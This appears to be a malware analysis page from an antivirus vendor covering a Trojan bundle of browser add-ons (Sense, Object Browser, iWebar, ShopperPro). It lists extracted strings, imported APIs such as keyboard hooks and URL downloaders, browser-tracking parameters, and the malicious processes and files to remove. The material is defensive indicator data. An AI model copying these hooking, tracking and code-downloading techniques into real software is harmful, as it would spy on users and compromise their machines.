    SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe
    Google\Chrome\Application\chrome.exe
    Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
    Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
    Software\Mozilla\Mozilla Firefox
    Mozilla\Mozilla Firefox
    SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
    Mozilla Firefox\firefox.exe
    %d.%d (%d)
    SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ie-error.gif
    browser=%s&browserver=%s
    ver=%s
    bic=%s
    app=%s
    curtime=%d
    lifetime=%d
    action=%s
    error=%s
    il=%d
    bgver=%s
    chromever=%s
    ffver=%s
    iever=%s
    srcid=%s
    subid=%s
    zdata=%s
    64.dll
    -buttonutil64.dll
    -bho64.dll
    -bho.dll
    -buttonutil64.exe
    -buttonutil.dll
    -buttonutil.exe
    button_failed_to_run_exe
    requestUrl
    monitor.onBeforeNavigate
    monitor.onRedirect
    monitor.onRequest
    file://%sbackground.html
    FRegCreateKeyTransactedA
    RegDeleteKeyTransactedA
    RegDeleteKeyExA
    HKEY_CLASSES_ROOT
    HKEY_CURRENT_USER
    HKEY_LOCAL_MACHINE
    HKEY_USERS
    HKEY_PERFORMANCE_DATA
    HKEY_DYN_DATA
    HKEY_CURRENT_CONFIG
    /windowswitch
    /windowswitchwithtab
    /windowswitch=
    /windowswitchwithtab=
    %s%s_popup.html
    %a, %e %b %Y %H:%M:%S
    %a, %e-%b-%y %H:%M:%S
    %a %b %e %H:%M:%S %Y
    DebuggedAppUrl
    \debug.js
    DebuggedBgUrl
    \bg_debug.js
    DebuggedNewTabUrl
    \new_debug.js
    onForUrl
    -bg.exe
    -helper.exe
    -codedownloader.exe
    windows_ie_ac_001
    Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    \Packages\windows_ie_ac_001\AC
    Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\
    %s\%s
    inflate 1.2.7 Copyright 1995-2012 Mark Adler
    function not supported
    operation canceled
    address_family_not_supported
    operation_in_progress
    operation_not_supported
    protocol_not_supported
    operation_would_block
    address family not supported
    broken pipe
    inappropriate io control operation
    not supported
    operation in progress
    operation not permitted
    operation not supported
    operation would block
    protocol not supported
    GetProcessWindowStation
    operator
    VERSION.dll
    URLDownloadToCacheFileA
    urlmon.dll
    InternetCrackUrlA
    HttpOpenRequestA
    HttpSendRequestA
    HttpQueryInfoA
    WININET.dll
    WS2_32.dll
    KERNEL32.dll
    GetKeyboardState
    keybd_event
    SetWindowsHookExA
    UnhookWindowsHookEx
    CreateDialogIndirectParamA
    USER32.dll
    GDI32.dll
    RegCloseKey
    RegOpenKeyExA
    RegCreateKeyExA
    RegDeleteKeyA
    RegEnumKeyExA
    RegQueryInfoKeyW
    ADVAPI32.dll
    ShellExecuteExA
    SHFileOperationA
    SHELL32.dll
    ole32.dll
    OLEAUT32.dll
    UrlEscapeA
    SHLWAPI.dll
    COMCTL32.dll
    GdiplusShutdown
    gdiplus.dll
    GetCPInfo
    zcÁ
    c:\program files\sense\sense-bg.exe
    $iTXtXML:com.adobe.xmp
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    combase.dll
    - CRT not initialized
    - Attempt to initialize the CRT more than once.
    - floating point support not loaded
    mscoree.dll
    USER32.DLL
    portuguese-brazilian
    {8856F961-340A-11D0-A96B-00C04FD705A2}
    Sense exe
    1000.1000.1000.1000
    Sense.exe
    Arrange Icons/Arrange windows so they overlap
    Cascade Windows5Arrange windows as non-overlapping tiles
    Tile Windows5Arrange windows as non-overlapping tiles
    Tile Windows(Split the active window into panes
    Replace%Select the entire document

    object browser-bg.exe_2252:

    .text
    `.rdata
    @.data
    .rsrc
    ?%u4W
    %uiGC
    j.Yf;
    _tcPVj@
    .PjRW
    /windowswitchwithtab=%d
    HttpRequest Code
    window.appAPIinternal = appAPIinternal;
    if (typeof console !== "undefined" && typeof console.error !== "undefined") {
    console.error("---- JS Exception from:
    application/x-www-form-urlencoded
    /windowswitch=%d
    iexplore.exe
    openUrl error=
    msgObj
    pacFileUrl
    %userprofile%
    1.2.1
    Invalid HTTP(S) status code
    https://
    urlRedirected
    InternetCrackUrl Failed
    port
    HttpOpenRequest Failed
    HttpSendRequest Failed with:
    HttpQueryInfo Failed
    originUrl
    redirectUrl
    httpCode
    ntdll.dll
    GetProcessHeap
    - Exception message: '   e.message);}}catch(e1){}}
    }catch(e){try{if(console && console.log){console.log('Caught an exception from:
    kernel32.dll
    Advapi32.dll
    RegOpenKeyTransactedA
    %d.%d.%d.%d
    SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe
    Google\Chrome\Application\chrome.exe
    Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
    Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
    Software\Mozilla\Mozilla Firefox
    Mozilla\Mozilla Firefox
    SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
    Mozilla Firefox\firefox.exe
    %d.%d (%d)
    SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ie-error.gif
    browser=%s&browserver=%s
    ver=%s
    bic=%s
    app=%s
    curtime=%d
    lifetime=%d
    action=%s
    error=%s
    il=%d
    bgver=%s
    chromever=%s
    ffver=%s
    iever=%s
    srcid=%s
    subid=%s
    zdata=%s
    64.dll
    -buttonutil64.dll
    -bho64.dll
    -bho.dll
    -buttonutil64.exe
    -buttonutil.dll
    -buttonutil.exe
    button_failed_to_run_exe
    requestUrl
    monitor.onBeforeNavigate
    monitor.onRedirect
    monitor.onRequest
    file://%sbackground.html
    FRegCreateKeyTransactedA
    RegDeleteKeyTransactedA
    RegDeleteKeyExA
    HKEY_CLASSES_ROOT
    HKEY_CURRENT_USER
    HKEY_LOCAL_MACHINE
    HKEY_USERS
    HKEY_PERFORMANCE_DATA
    HKEY_DYN_DATA
    HKEY_CURRENT_CONFIG
    /windowswitch
    /windowswitchwithtab
    /windowswitch=
    /windowswitchwithtab=
    %s%s_popup.html
    %a, %e %b %Y %H:%M:%S
    %a, %e-%b-%y %H:%M:%S
    %a %b %e %H:%M:%S %Y
    DebuggedAppUrl
    \debug.js
    DebuggedBgUrl
    \bg_debug.js
    DebuggedNewTabUrl
    \new_debug.js
    onForUrl
    -bg.exe
    -helper.exe
    -codedownloader.exe
    windows_ie_ac_001
    Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    \Packages\windows_ie_ac_001\AC
    Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\
    %s\%s
    inflate 1.2.7 Copyright 1995-2012 Mark Adler
    function not supported
    operation canceled
    address_family_not_supported
    operation_in_progress
    operation_not_supported
    protocol_not_supported
    operation_would_block
    address family not supported
    broken pipe
    inappropriate io control operation
    not supported
    operation in progress
    operation not permitted
    operation not supported
    operation would block
    protocol not supported
    GetProcessWindowStation
    operator
    VERSION.dll
    URLDownloadToCacheFileA
    urlmon.dll
    InternetCrackUrlA
    HttpOpenRequestA
    HttpSendRequestA
    HttpQueryInfoA
    WININET.dll
    WS2_32.dll
    KERNEL32.dll
    GetKeyboardState
    keybd_event
    SetWindowsHookExA
    UnhookWindowsHookEx
    CreateDialogIndirectParamA
    USER32.dll
    GDI32.dll
    RegCloseKey
    RegOpenKeyExA
    RegCreateKeyExA
    RegDeleteKeyA
    RegEnumKeyExA
    RegQueryInfoKeyW
    ADVAPI32.dll
    ShellExecuteExA
    SHFileOperationA
    SHELL32.dll
    ole32.dll
    OLEAUT32.dll
    UrlEscapeA
    SHLWAPI.dll
    COMCTL32.dll
    GdiplusShutdown
    gdiplus.dll
    GetCPInfo
    zcÁ
    c:\program files\object browser\object browser-bg.exe
    $iTXtXML:com.adobe.xmp
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    combase.dll
    - CRT not initialized
    - Attempt to initialize the CRT more than once.
    - floating point support not loaded
    mscoree.dll
    USER32.DLL
    portuguese-brazilian
    {8856F961-340A-11D0-A96B-00C04FD705A2}
    Object Browser exe
    1000.1000.1000.1000
    Object Browser.exe
    Arrange Icons/Arrange windows so they overlap
    Cascade Windows5Arrange windows as non-overlapping tiles
    Tile Windows5Arrange windows as non-overlapping tiles
    Tile Windows(Split the active window into panes
    Replace%Select the entire document

    iwebar-bg.exe_296:

    .text
    `.rdata
    @.data
    .rsrc
    ?%u4W
    %uiGC
    j.Yf;
    _tcPVj@
    .PjRW
    /windowswitchwithtab=%d
    HttpRequest Code
    window.appAPIinternal = appAPIinternal;
    if (typeof console !== "undefined" && typeof console.error !== "undefined") {
    console.error("---- JS Exception from:
    application/x-www-form-urlencoded
    /windowswitch=%d
    iexplore.exe
    openUrl error=
    msgObj
    pacFileUrl
    %userprofile%
    1.2.1
    Invalid HTTP(S) status code
    https://
    urlRedirected
    InternetCrackUrl Failed
    port
    HttpOpenRequest Failed
    HttpSendRequest Failed with:
    HttpQueryInfo Failed
    originUrl
    redirectUrl
    httpCode
    ntdll.dll
    GetProcessHeap
    - Exception message: '   e.message);}}catch(e1){}}
    }catch(e){try{if(console && console.log){console.log('Caught an exception from:
    kernel32.dll
    Advapi32.dll
    RegOpenKeyTransactedA
    %d.%d.%d.%d
    SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe
    Google\Chrome\Application\chrome.exe
    Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
    Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
    Software\Mozilla\Mozilla Firefox
    Mozilla\Mozilla Firefox
    SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
    Mozilla Firefox\firefox.exe
    %d.%d (%d)
    SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ie-error.gif
    browser=%s&browserver=%s
    ver=%s
    bic=%s
    app=%s
    curtime=%d
    lifetime=%d
    action=%s
    error=%s
    il=%d
    bgver=%s
    chromever=%s
    ffver=%s
    iever=%s
    srcid=%s
    subid=%s
    zdata=%s
    64.dll
    -buttonutil64.dll
    -bho64.dll
    -bho.dll
    -buttonutil64.exe
    -buttonutil.dll
    -buttonutil.exe
    button_failed_to_run_exe
    requestUrl
    monitor.onBeforeNavigate
    monitor.onRedirect
    monitor.onRequest
    file://%sbackground.html
    FRegCreateKeyTransactedA
    RegDeleteKeyTransactedA
    RegDeleteKeyExA
    HKEY_CLASSES_ROOT
    HKEY_CURRENT_USER
    HKEY_LOCAL_MACHINE
    HKEY_USERS
    HKEY_PERFORMANCE_DATA
    HKEY_DYN_DATA
    HKEY_CURRENT_CONFIG
    /windowswitch
    /windowswitchwithtab
    /windowswitch=
    /windowswitchwithtab=
    %s%s_popup.html
    %a, %e %b %Y %H:%M:%S
    %a, %e-%b-%y %H:%M:%S
    %a %b %e %H:%M:%S %Y
    DebuggedAppUrl
    \debug.js
    DebuggedBgUrl
    \bg_debug.js
    DebuggedNewTabUrl
    \new_debug.js
    onForUrl
    -bg.exe
    -helper.exe
    -codedownloader.exe
    windows_ie_ac_001
    iWebar
    Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    \Packages\windows_ie_ac_001\AC
    Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\
    %s\%s
    inflate 1.2.7 Copyright 1995-2012 Mark Adler
    function not supported
    operation canceled
    address_family_not_supported
    operation_in_progress
    operation_not_supported
    protocol_not_supported
    operation_would_block
    address family not supported
    broken pipe
    inappropriate io control operation
    not supported
    operation in progress
    operation not permitted
    operation not supported
    operation would block
    protocol not supported
    GetProcessWindowStation
    operator
    VERSION.dll
    URLDownloadToCacheFileA
    urlmon.dll
    InternetCrackUrlA
    HttpOpenRequestA
    HttpSendRequestA
    HttpQueryInfoA
    WININET.dll
    WS2_32.dll
    KERNEL32.dll
    GetKeyboardState
    keybd_event
    SetWindowsHookExA
    UnhookWindowsHookEx
    CreateDialogIndirectParamA
    USER32.dll
    GDI32.dll
    RegCloseKey
    RegOpenKeyExA
    RegCreateKeyExA
    RegDeleteKeyA
    RegEnumKeyExA
    RegQueryInfoKeyW
    ADVAPI32.dll
    ShellExecuteExA
    SHFileOperationA
    SHELL32.dll
    ole32.dll
    OLEAUT32.dll
    UrlEscapeA
    SHLWAPI.dll
    COMCTL32.dll
    GdiplusShutdown
    gdiplus.dll
    GetCPInfo
    zcÁ
    c:\program files\iwebar\iwebar-bg.exe
    $iTXtXML:com.adobe.xmp
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    combase.dll
    - CRT not initialized
    - Attempt to initialize the CRT more than once.
    - floating point support not loaded
    mscoree.dll
    USER32.DLL
    portuguese-brazilian
    {8856F961-340A-11D0-A96B-00C04FD705A2}
    iWebar exe
    1000.1000.1000.1000
    iWebar.exe
    Arrange Icons/Arrange windows so they overlap
    Cascade Windows5Arrange windows as non-overlapping tiles
    Tile Windows5Arrange windows as non-overlapping tiles
    Tile Windows(Split the active window into panes
    Replace%Select the entire document


    Remove it with Ad-Aware

    1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. Update the definition files.
    3. Run a full scan of your computer.


    Manual removal*

    1. Scan a system with an anti-rootkit tool.
    2. Terminate malicious process(es) (How to End a Process With the Task Manager):

      GoogleUpdate.exe:3772
      GoogleUpdate.exe:3776
      GoogleUpdate.exe:2432
      GoogleUpdate.exe:2980
      GoogleUpdate.exe:2700
      GoogleUpdate.exe:1648
      GoogleUpdate.exe:2176
      GoogleUpdate.exe:3376
      GoogleUpdate.exe:2792
      GoogleUpdate.exe:2800
      smu.exe:3500
      smu.exe:3548
      smu.exe:2884
      34d16228-9e90-4879-9804-8e38b5180d78-4.exe:4036
      yta.exe:3008
      Ecixv.exe:3048
      shopperpro.exe:2524
      iwebar-buttonutil.exe:3200
      sense.exe:3392
      YouTubeAcceleratorService.exe:2072
      YouTubeAcceleratorService.exe:2332
      YouTubeAcceleratorService.exe:1952
      GLB12.tmp:3040
      bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-2.exe:3444
      sc.exe:3340
      iWebar-codedownloader.exe:2088
      iWebar-codedownloader.exe:2412
      iedw.exe:3480
      Ixesxgrajdtli.exe:3116
      Sense-codedownloader.exe:3148
      Sense-codedownloader.exe:216
      sma.exe:3780
      sma.exe:620
      sma.exe:4088
      sma.exe:3724
      sma.exe:3972
      sma.exe:324
      sma.exe:3056
      sma.exe:3068
      Udugcvjfj.exe:3492
      setup.exe:264
      testlsp.exe:2720
      schtasks.exe:2756
      schtasks.exe:2784
      schtasks.exe:2976
      schtasks.exe:1864
      bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-4.exe:4020
      sm.exe:2844
      ShopperPro.exe:2564
      34d16228-9e90-4879-9804-8e38b5180d78-2.exe:3468
      iwebar.exe:3032
      Object Browser-bg.exe:3272
      GLJ15.tmp:3704
      %original file name%.exe:220
      regsvr32.exe:2616
      regsvr32.exe:3068
      regsvr32.exe:2176
      regsvr32.exe:3004
      sense-buttonutil.exe:3896
      ca91e4a6-ab07-4dc2-9156-7c7e5962e962-2.exe:2904
      Sense-bg.exe:2568
      lspinst.exe:2404
      lspinst.exe:2656
      ca91e4a6-ab07-4dc2-9156-7c7e5962e962-3.exe:2460
      wscript.exe:3432
      dwwin.exe:2388
      object browser-buttonutil.exe:3908
      iWebar-bg.exe:3248
      ca91e4a6-ab07-4dc2-9156-7c7e5962e962-4.exe:2720
      cr.exe:2984
      Object Browser-codedownloader.exe:600
      Object Browser-codedownloader.exe:2148

    3. Delete the original Trojan file.
    4. Delete or disinfect the following files created/modified by the Trojan:

      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Tar33.tmp (2712 bytes)
      %WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (888 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
      %Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (32 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Cab32.tmp (54 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
      %WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (892 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)
      %WinDir%\Temp\vup.tmp (90 bytes)
      %Documents and Settings%\All Users\Application Data\SearchModule\smhe.js (439 bytes)
      %WinDir%\Temp\SM_cache_iexplore.exe.cache (521 bytes)
      %WinDir%\Tasks\SMW_UpdateTask_Time_3835323735333432352d3437415a556c2a3223346c41.job (952 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\GLB12.tmp (71 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\InstallerUtils.dll (25824 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\GoogleUpdate.exe (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\246.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\17.js (2392 bytes)
      %Program Files%\Object Browser\Object Browser-buttonutil.dll (2321 bytes)
      %Program Files%\Object Browser\Object Browser.ico (15 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\38.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\223.js (453 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\update[1].json (39 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\184.js (1 bytes)
      %Program Files%\Object Browser\bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-4.exe (5873 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\42.js (6 bytes)
      %Program Files%\Object Browser\bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-5.exe (1425 bytes)
      %Program Files%\Object Browser\Object Browser-codedownloader.exe (3073 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\1.js (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\78.js (3 bytes)
      %WinDir%\Tasks\bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-1.job (70 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\UserInfo.dll (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\64.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\104.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\36.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\41.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\ExecDos.dll (5 bytes)
      %Program Files%\Object Browser\Object Browser-buttonutil.exe (1425 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\19042 (209416 bytes)
      %Program Files%\Object Browser\utils.exe (33376 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\System.dll (11 bytes)
      %Program Files%\Object Browser\Object Browser-bg.exe (4185 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\211.js (797 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\7.js (685 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\2.js (63 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\GoogleUpdateOnDemand.exe (46 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\35.js (9 bytes)
      %WinDir%\Tasks\bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-4.job (72 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\45.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\userCode\background.js (429 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\207.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\47.js (7 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\goopdateres_en.dll (26 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\nsisos.dll (5 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\userCode\extension.js (5 bytes)
      %Program Files%\Object Browser\bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-2.exe (2105 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\StdUtils.dll (14 bytes)
      %WinDir%\Tasks\bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-2.job (70 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\182.js (14 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\update.json (39 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\inetc.dll (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\22.js (8 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\md5dll.dll (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\217.js (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\psuser.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\91.js (5520 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\177.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\GoogleUpdateBroker.exe (46 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins.json (14 bytes)
      %Program Files%\Object Browser\32850.xpi (3073 bytes)
      %WinDir%\Tasks\bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-5.job (70 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\244.js (501 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\npGoogleUpdate4.dll (1281 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\manifest.xml (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\4.js (3312 bytes)
      %Program Files%\Object Browser\Uninstall.exe (601 bytes)
      %Program Files%\Object Browser\Object Browser-bho.dll (3361 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\3.js (63 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\94.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\9.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\40.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\242.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\43.js (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\72.js (1552 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\28.js (536 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\13.js (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsd19.tmp (286014 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\354564 (780048 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\21.js (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\93.js (793 bytes)
      %Program Files%\Object Browser\background.html (729 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\191.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\37.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\123.js (889 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\46.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\102.js (1 bytes)
      %WinDir%\Tasks\temp_bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-2.job (138 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\183.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\goopdate.dll (5441 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\psmachine.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\14.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\InstallerUtils2.dll (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\260.js (605 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\GoogleCrashHandler.exe (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\180.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\39.js (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\44.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\GoogleUpdateHelper.msi (32 bytes)
      %Program Files%\ShopperPro\Updater.exe (24832 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\MoreInfo.dll (7 bytes)
      %Program Files%\ShopperPro\manifest.json (595 bytes)
      %Program Files%\ShopperPro\database1_0_0.json (6 bytes)
      %Documents and Settings%\All Users\Documents\ShopperPro\JsDriver\Config.xml (1 bytes)
      %Program Files%\ShopperPro\SPRemove.exe (17848 bytes)
      %Program Files%\ShopperPro\FireFox\chrome.manifest (113 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsExec.dll (6 bytes)
      %Program Files%\ShopperPro\FireFox\content\overlay.xul (203 bytes)
      %Program Files%\ShopperPro\JSDriver\jsdrv.exe (102654 bytes)
      %Program Files%\ShopperPro\ShopperPro.zip (1856 bytes)
      %Program Files%\ShopperPro\ShopperPro64.dll (17848 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsProcess.dll (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsv5.tmp (152650 bytes)
      %Program Files%\ShopperPro\ShopperPro.dll (15168 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\jsdrv.exe (102654 bytes)
      %Program Files%\ShopperPro\FireFox\install.rdf (828 bytes)
      %Program Files%\ShopperPro\ShopperPro.crx (1856 bytes)
      %Program Files%\ShopperPro\FireFox\content\overlay.js (11 bytes)
      %Program Files%\ShopperPro\FireFox\content\shopperpro_128.png (5 bytes)
